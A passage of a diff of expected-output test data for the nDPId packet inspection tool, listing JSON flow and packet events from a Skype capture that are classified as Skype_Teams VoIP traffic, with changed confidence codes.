{"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":771,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":772,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA13XsAAEARu5rAqAEinTeCoDLdnEgAIdXCezcCHsxzqj9mHv\/LaKdjYymm7xXHyFOeHw=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":772,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":772,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":773,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1431970657867,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970657867,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9HFoAAEARyynAqAEinTg0KjLdnEUAKXprezkCzIUWKH677Ew8QeRY2LFi0olqYWN\/wfRNYM+xO4zo"} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970657867,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1431970658156,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970658156,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGxWVv3U2vwKgBIpxeyDDQUSwBCFXs56ASOJDrCwAAAgQFrAQCCApNo+IOPjHhAAEDAwk="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1431970658156,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970658156,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0UMZAAEAGaqfAqAEib91Nr8gwnF4IVezn0FEsAoAQECxBFgAAAQEICj4x4iBNo+IO"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MmQAAEARtULAqAEinTg0EDLdnGAAINARezsCntsIeaNpS6NjCmJc+OoOrMkvCcDa"} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":787,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAABAykUAAEARZUbAqAEi1cezjzLdnFIALAJQez0CXU0wVq4fYZh\/Y+8+QJuiiaVycN5JEmy9Mj2R1c64L1Y6"} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":788,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":788,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7lJ0AAEARm2LAqAEinTfrsDLdnF8AJ1FIez8C0TqVtIrtp1zqD0lx1wHOKMmPMNUvlfjRgE8UFg=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4HuEAAEARyLnAqAEinTg0GDLdnGAAJDiFe0ECGzhHlfYpbTJCQlYvElI0z7NbdWF7vdKvag=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":789,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":789,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1431970658879,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970658879,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/Lr4AAEAR0DTAqAEib91KFDLdnGEAK3JGe0MC70klwlgauZl1jUNJ9T6muSj9wXln3SVqW5QyJa+s4xA="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970658879,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659480,"flow_last_seen":1431970659480,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970659480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1431970659480,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970659480,"pkt":"0NQSxnP1PBXCt3IOCABFAABAaDxAAEAGUyXAqAEib91Nr8gyAbuh2H3fAAAAALAC\/\/+ohwAAAgQFtAEDAwUBAQgKPjHnRwAAAAAEAgAA"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1431970659834,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970659834,"pkt":"0NQSxnP1PBXCt3IOCABFAABAPbBAAEAG45PAqAEiQAQXpsgznF2bjnkgAAAAALAC\/\/99bQAAAgQFtAEDAwUBAQgKPjHoqQAAAAAEAgAA"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":793,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1431970659834,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970659834,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1elAAAEARHtbAqAEinTeCkDLdnFAAIfN1e0UCt0zo\/WrZ+Zw8Ki6+SR8vgG1TLjatCw=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1431970659834,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970659834,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/fyEAAEARaHbAqAEinTg0FDLdnGEAK5aLe0cCmWiuCofYyBz6GXTZdvI4LweQLKgxsl8j0KcXdBMS+c8="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.144","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 